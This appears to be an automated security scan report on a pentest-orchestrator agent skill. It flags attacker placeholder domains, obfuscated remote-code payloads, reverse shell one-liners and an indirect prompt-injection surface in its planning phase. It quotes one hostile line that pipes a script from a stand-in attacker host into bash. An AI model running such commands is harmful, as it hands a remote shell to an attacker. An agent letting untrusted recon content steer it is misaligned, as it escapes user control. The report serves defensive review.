The Agent Skills Directory

[DATA_EXFILTRATION]: Documentation files, specifically within the host-header and authentication guides, contain references to non-whitelisted and potentially risky domains such as attacker-server.com, app.interactsh.com, and ngrok.io. These domains are flagged by automated scanners for associations with phishing or OOB interaction testing. While intended as placeholders for security testing, they represent a data exposure surface.
[REMOTE_CODE_EXECUTION]: The reference library includes numerous examples of remote code execution techniques, such as piping remote scripts directly into bash or python interpreters. Furthermore, the skill contains obfuscated payloads using Base64 encoding to mask commands like curl attacker.com/shell.sh | bash within the attacks/essential-skills/burp-suite/essential-skills-cheat-sheet.md file.
[COMMAND_EXECUTION]: Multiple documentation files detail high-risk command execution patterns, including the use of database system commands like xp_cmdshell and various reverse shell one-liners across different languages (PHP, Python, Bash, Perl, Ruby).
[PROMPT_INJECTION]: The pentest orchestrator defined in SKILL.md has an indirect prompt injection surface. During Phase 3 (Planning & Approval), the agent is instructed to analyze reconnaissance findings which are derived from untrusted external sources (e.g., target web headers, API documentation). The skill does not define explicit boundary markers or sanitization steps to prevent this untrusted content from influencing the generated test plans or agent behavior.

pentest